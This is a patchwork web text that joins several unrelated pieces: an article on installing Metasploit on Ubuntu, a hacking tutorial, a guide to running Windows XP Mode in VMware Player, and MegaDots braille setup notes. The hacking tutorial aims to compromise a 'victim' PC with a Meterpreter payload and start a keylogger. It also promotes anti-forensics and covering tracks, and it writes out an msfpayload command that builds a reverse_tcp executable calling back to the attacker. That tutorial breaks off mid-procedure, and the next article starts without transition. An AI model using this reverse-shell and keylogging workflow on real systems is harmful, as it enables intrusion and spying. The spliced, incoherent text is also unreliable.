This is my first contribution in an ongoing series detailing the best free, open source hacking and penetration-testing tools available. My goal is to show you some of the quality tools that IT security experts use every day in their jobs as network security and pen-testing professionals. There are hundreds of tools out there, but I will focus on those that meet four key criteria:
Open source
Free
High quality
Widely used and trusted in the IT security/pen-testing community
As such, no hacker/penetration tool box is complete without the addition of the versatile and powerful Metasploit.
What Is Metasploit?
Metasploit is among the most widely used exploitation tools in the hacking/security field. It's used by both novices and advanced professionals. Insecure.Org, run by Fyodor, the founder of Nmap, annually surveys security professionals for their opinion on the top security software. Metasploit has consistently ranked among the top ten since its inception and currently ranks second. That should give you some idea of how important Metasploit is in the security community.
Metasploit is a self-described "framework" for cyber exploitation. As a framework, it eases the effort to exploit known vulnerabilities in networks, operating systems and applications, and to develop new exploits for new or unknown vulnerabilities. As of last Thursday, Project Basecamp announced the development of a Stuxnet-like module for Metasploit.
Metasploit also includes Meterpreter, a payload that, once loaded into a target system, makes maintaining access to and controlling the target much easier. As such, every self-respecting hacker (and even those without self-respect) should have some basic knowledge of Metasploit. This series of articles will initially focus on conferring at least a rudimentary understanding of how Metasploit works and how it can be used by the hacker/penetration tester to own the box, download data and cover your tracks.
A Little Background
Metasploit was developed in 2003 as an open source project by H.D. Moore. Originally written in Perl, it was rewritten in Ruby by the developer team in 2007. This is critical, because you need to have Ruby on your system in order to run Metasploit and to develop your own exploits.
After many years of success in the hacker/penetration tester community, it was purchased by Rapid7 in 2009. After its purchase, the Metasploit framework was split into three versions. Two are commercial versions: Metasploit Express and Metasploit Professional, the latter selling for $1800. These two have nice GUIs and numerous bells and whistles, including the automation of several attacks, but there is still a free and open source community edition known as Metasploit Community.
Fortunately, the independent developers of Armitage have created a free and open source GUI for Metasploit that is both beautiful and elegant, for those who prefer the point-and-click mode of operation.
There is a Windows version of Metasploit, but many of the features (raw IP packet injection, wireless driver exploitation, SMB relaying attacks, etc.) are unavailable in the Windows environment, though some of these limitations can be overcome by using Cygwin or running Windows in a virtual environment on Linux.
For these and other reasons, we will commence this series using the more flexible command line interface (CLI) version in Linux, and eventually we will install and use the Armitage GUI.
Download and Installation
The first step in our process is to download and install Metasploit. Although there is a Windows version, I will focus on the Linux version because of its greater flexibility and capability. Let's walk through the download and installation on my favorite Linux distro, Ubuntu.
To install the latest version of the Metasploit 4 Framework (MSF4) on Ubuntu 10.04 (or any other Debian-based distro), use the following commands. This downloads and installs the generic Linux binary, which comes bundled with all the components you need for Metasploit to install and run. This should work for most users and is the easiest and quickest way to get the Metasploit Framework running under Ubuntu and other Debian-based Linux distros.
First open a terminal window and type:
wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run
If you're installing on a 64-bit build of Ubuntu, use this instead:
wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-x64-full.run
This downloads the current version of the Metasploit framework via wget.
Before you can run the installer, you need to make it executable. In the terminal, change the mode to add execute (x) permission for the Metasploit installer:
chmod +x framework-4.*-linux-full.run
Now execute the installer with root privileges by typing sudo and ./ followed by the name of the package:
sudo ./framework-4.*-linux-full.run
Note that the 64-bit file is named framework-4.0.0-linux-x64-full.run, so on a 64-bit system adjust the file name in both commands to match. You should then be prompted for your root password. After entering it, you should get a screen that looks something like this:
Go ahead and click Forward.
Agree to the terms of the license agreement and click Forward.
I suggest that you select Yes for automatic updates so that your exploit framework has the latest and greatest updates. Click Forward.
Here, Metasploit is asking whether you want to insert a different service script. You can just accept the default and hit Forward.
Be patient now; it will take Metasploit a few minutes to install and build your database. After it's done, you are ready to run Metasploit. Simply type:
msfconsole
Finally, you should be greeted by this screen.
You have now successfully installed the world's best open source exploit framework and you are ready to begin system/network exploitation and pen testing!
Please note that in my installation here, it warns me that updating is recommended, as the last update was 249 days ago. If you want to update your framework, then type:
sudo msfupdate
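The download-and-install steps above, collected into one shell script as an added example that is not from the original article. It picks the installer file from `uname -m` (which matters because the 64-bit file is named framework-4.0.0-linux-x64-full.run and so does not match the framework-4.*-linux-full.run pattern), and it refuses to hand anything to sudo that is not a non-empty shell archive. The URLs are the two quoted above; the shell-archive check is an assumption of ours.

```shell
#!/bin/sh
# Added example (not from the original article): download, sanity-check,
# mark executable and run the Metasploit 4 Linux installer.
# Assumption: the .run installer is a self-extracting shell archive, so a
# genuine download begins with a "#!" interpreter line.

BASE_URL="http://updates.metasploit.com/data/releases"

# Map the output of `uname -m` to the installer file name quoted in the article.
# Prints the file name; returns 1 for an architecture the article has no build for.
select_installer() {
    case "$1" in
        x86_64|amd64) echo "framework-4.0.0-linux-x64-full.run" ;;
        i?86)         echo "framework-4.0.0-linux-full.run" ;;
        *)            echo "unsupported architecture: $1" >&2; return 1 ;;
    esac
}

# Sanity check on a downloaded file before it is executed as root:
# it must exist, be non-empty, and start with "#!". Returns 0 if it passes.
looks_like_run_installer() {
    f="$1"
    [ -s "$f" ] || return 1
    [ "$(head -c 2 "$f")" = "#!" ] || return 1
    return 0
}

# Download the right installer, check it, then chmod +x and run it via sudo.
install_metasploit() {
    file=$(select_installer "$(uname -m)") || return 1
    wget -O "$file" "$BASE_URL/$file" || return 1
    if ! looks_like_run_installer "$file"; then
        echo "$file does not look like a valid installer; not running it" >&2
        return 1
    fi
    chmod +x "$file"
    sudo "./$file"
}
```

Source the file and call install_metasploit to run the whole procedure; the two helper functions can be exercised on their own.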
In my next article, we will look at the terminology and components of Metasploit and then run a tried and true exploit.
Note: This is an advanced topic. Read carefully. Feel free to ask any queries; we are always here to help you.
If you are really interested in network security, chances are you have heard of Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wn you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise from something as simple as not updating your Flash player last week when it prompted you to do so.
Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that it can be understood by everyone here. Also, Metasploit can be used with several other tools such as Nmap or Nessus (all of these tools are present in BackTrack).
In this tutorial, I'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.
Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.
Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them):
Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: An error caused when a program tries to store data beyond the size of its buffer. It may be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.
Now, what is Metasploit?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.
METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti-forensics, making the forensic analysis of the compromised computer a little more difficult. They are released as part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness and power from a pentester's point of view. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.
I would recommend doing the following things in Metasploit on BackTrack (a system or an image), avoiding the Windows version of the tool.
For those who don't know, BackTrack is a Linux distro made especially for security personnel, including all the tools required by a pentester.
Download BackTrack from here. You can download the ISO or the VMware image, according to the one you're comfortable with. If you have physical access to more than one system, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin:
Open up backtrack. You should have a screen similar to this.
The default login credentials are:
Username: root
Pass: toor
To start the wicd network manager, type in:
root@bt:~#/etc/init.d/wicd start
Finally, type "startx" to start the GUI mode:
root@bt:~#startx
First of all, know your local IP. Open a Konsole (on the bottom left of the taskbar) and type in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now, launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole
You should now have a shell something similar to a command prompt in Windows.
msf >
Let's now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window ("Session>>New Shell", or click on the small icon on the left of the shell tab in the bottom left corner of the window):
root@bt:/opt/metasploit3/msf3#
./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" X > /root/reverse_tcp.exe
Your local IP is the one you noted earlier, and for the port you could select 4444. (The output-format flag is an uppercase X, which tells msfpayload to emit a Windows executable.)
Even if your computer doesn't have hardware virtualization, you can still install XP Mode, but you cannot run it as you can't run Virtual PC. Enter VMware Player. This free program lets you create and run virtual machines, whether or not you have hardware virtualization. And it can directly import XP Mode, so you can use that copy of XP for free. A couple of features are different, but it's still a great replacement, since you otherwise couldn't use it at all.
Note: XP Mode does not work on Home versions of Windows 7, and you'll need VMware Player 3.0.
Getting Started
First, download and install XP Mode (link below). There is no need to download Virtual PC if your computer cannot run it, so just download XP Mode from the link on the left.
Install XP mode; just follow the default prompts as usual.
Now, download and install VMware Player. The download is free, but requires registration.
You may see some prompts about installing drivers; simply approve them. We didn't see them on our latest test, but have in the past. When you are finished installing VMware Player, you will have to restart your computer.
Add XP Mode to VMware Player
Now that your computer is rebooted, run VMware Player. We can import XP Mode by clicking File, then clicking "Import Windows XP Mode VM."
VMware Player will simply start importing your XP Mode. Converting XP Mode to VMware format may take a couple of minutes depending on your hardware, so just be patient.
When this is done, you should see a new virtual machine in VMware Player called XP Mode! Click "Play Virtual Machine" to run XP Mode.
XP will run through its first-run setup process.
While it is loading, you may be prompted to install or update VMware Tools. This is required to integrate XP Mode into your computer, so click Update Tools or Install Tools depending on your situation.
The tools will automatically download and install, though you may have to approve a UAC prompt.
Now you can proceed with your XP setup: accept the license agreement, choose your locale and keyboard settings, enter a name for the virtual machine and an administrative password, and enter the correct date, time, and time zone. It usually gets the correct time and date from your computer itself, but the time zone is often incorrect.
XP will now finalize your changes, and then reboot.
When XP Mode restarts, choose your settings for updates.
Windows may ask to search for drivers. Simply press Cancel, as VMware Tools will contain everything we need.
After a short delay, you should see your XP desktop in VMware Player!
There's one last thing that needs to be installed: VMware Tools. This should automatically open in XP Mode; if not, click Start, then My Computer, and finally double-click on the CD drive, which should say VMware Tools.
Now, simply run the Tools installer with the Typical setup type, and reboot XP Mode when it's finished.
Now VMware is set up and we're ready to start integrating it with Windows 7.
Integrate XP Mode in VMware Player with Windows 7
The real advantage of the default XP Mode in Windows 7 is that the XP programs are fully integrated with their Windows 7 counterparts. You can run them seamlessly with other programs, copy between them, and even open and save files to the same folders.
Let's set this up in VMware. Copy and paste from Windows 7 to XP Mode in VMware is activated by default. To use your XP programs seamlessly with Windows 7, click VM at the top of the VMware window, and click "Enter Unity."
You can easily access any program or file in XP Mode through a dedicated XP Mode Start Menu. When you hover over your Windows 7 Start button, a new button called "Windows XP Mode" will appear above it. Click there to access a full Start Menu from XP Mode right in Windows 7.
Here is an IE 6 window from XP running side-by-side with IE 8 in Windows 7, thanks to VMware Player!
By default, the virtualized windows will have a border and the VMware logo on their edge.
To remove this logo, click VM in the VMware Player window, then Settings. Click on the Options tab, and choose Unity on the left.
Now uncheck the boxes that say "Show borders" and "Show badges."
Removing the VMware borders and badges gives everything a more authentic XP Mode look and feel.
You can even use removable devices, such as flash drives, in XP Mode in VMware Player. Whenever you connect a new device to your computer, VMware will remind you that you can add it to XP Mode.
Simply click VM, then Removable Devices. Select your device name, and click Connect.
Save Files in XP Mode to My Documents in Windows 7
You may want to share the entire C drive of Windows 7 with the virtual XP computer. Bear in mind that anything running inside the guest then has the same access to those host files that the share grants, so share only what the guest actually needs.
By default, files created in XP Mode in VMware Player will be saved inside the virtual machine. It's more convenient if they're saved directly to the My Documents folder in Windows 7, so let's change this. Click VM, then Settings. Click the Options tab, and then choose Shared Folders on the left. Now click the bullet for "Always enabled" and check the box for "Map as a network drive in Windows guests."
Now click Add at the bottom of that window. This will let us add a shared folder.
Let's add the My Documents folder from Windows 7. Click Browse, and then select your My Documents folder. Click OK, and then click Next.
Make sure the box is checked that says "Enable this share" and then click Finish. You can now close the Settings window as well.
Back in XP Mode, click Start, then right-click on My Documents, and select Properties.
Click Move to find the new My Documents folder.
Find the folder we just shared from Windows 7 by clicking My Computer, then the drive that says "Shared Folders on 'vmware-host'" or something similar. Now select the folder we shared, Documents, and click OK.
Click OK in the main Properties window. It may offer to copy the files from your old My Documents folder to the new one; choose Yes to make sure you have all of your documents in Windows 7.
Now, whenever you go to save a file in XP Mode, it will automatically save in your My Documents folder on Windows 7. You can repeat the same process for any folder you wish, such as your My Pictures and My Music folders.
Conclusion
That's all. Now you have your full XP Mode running on your computer without hardware virtualization. Almost all the same features are there; the only thing you're missing is the Start Menu integration, but VMware's menu is the next best thing. In our tests, using VMware worked as well as or better than actual XP Mode on a machine that supports hardware virtualization. If you're frustrated that the Windows 7 machine(s) you have don't support XP Mode, our VMware method works, and allows you to use it on whatever machine you want.
Using Virtual Windows XP with MegaDots
Virtual Windows XP allows you to run applications within the Virtual PC window.
Install MegaDots in the Windows XP window. Answer no to the question about full screen.
Close the Windows XP window before launching MegaDots.
Install the Virtual System (32 bit Windows)
Install MegaDots in the Virtual System
If needed, reduce the screen resolution on the Host system until the Virtual system can fill the screen.
Set the Virtual System to Full Screen
Maximize the MegaDots font size as much as you can without losing any part of the MegaDots screen
If needed, lower the screen resolution for the Virtual System so that the MegaDots screen is even larger.
If you are using Windows XP, change the font name and size on the print side. To do that, launch MegaDots and press Alt-spacebar. Then press P and select the Font tab. Choose MegaDots window braille as your font.
The idea in enlarging the font is to make the window as big as possible without losing any part of the MegaDots screen. Be aware that the window can never take up the whole screen. For most laptops, we recommend 24 point for a sighted user and 20 point for a user of JAWS or Window-Eyes. If you are asked, save these parameters for future use of this program.
Be aware that the MegaDots window braille font is designed to work with screen font smoothing turned on. If the font appears to have box-like braille dots without any shadow dots, you have screen font smoothing turned off. On your desktop, right-click, choose Properties, Appearance, click on Effects and make sure the screen font smoothing choice is checked.
To make the display work as well as possible in MegaDots, go to the MegaDots Preferences Menu, Editor. Set Text size to N (Normal), as leaving it at C (Compact) causes problems. In the same form, also make sure that Big cursor is set to No. Do not forget to save your Preferences.
In the installation example, the host Windows 7 C drive looks to the XP machine like the Z drive.
Open the Z drive from within MegaDots to read files from the host machine.
On the Windows 7 Desktop, from the Start Menu, you can locate All Programs, Windows Virtual PC, Windows XP Mode Applications, Duxbury, MegaDots 2.5 without Speech. Right-click on this, and then select Send to and then Desktop (create shortcut). This way you can launch MegaDots directly from the Windows 7 Desktop. Using the Z drive (see above), you can read and write from the full Windows 7 hard drive. While there are some limitations, this is getting close to full use of MegaDots on a 64-bit system.
Some users find that using MegaDots in a window is distracting if there is too much going on outside the MegaDots window. Here is an excellent red background for use with MegaDots in a window; right-click on the image and select "Set as Background".
In order to import Word files, you do not need to have a copy of Microsoft Word installed in the XP emulation.
In order to export to Word files, you do need to install a copy of Microsoft Word in the XP emulation. Why? Because the DBT engine within MegaDots has all the software it needs to read Word files. But when MegaDots exports to Word, it is really exporting to HTML, and then using your existing copy of Word with Word automation to turn that into a genuine Word file. One approach is to export to HTML from the XP emulation, and save the HTML files on the Windows 7 computer. From the Windows 7 computer, you can import the HTML files and Save As Word files. This is time consuming, but avoids needing to obtain another copy of Word.
In order to do the work you want to do in the XP emulation, you may need to install other software programs, such as Adobe Reader or any other that helps you get your work done. Or you may need to install several printers for use within the emulation.
Remember that from the XP emulation, you can read any part of the
Windows 7 computer, but the Windows 7 computer cannot read
anything in the XP emul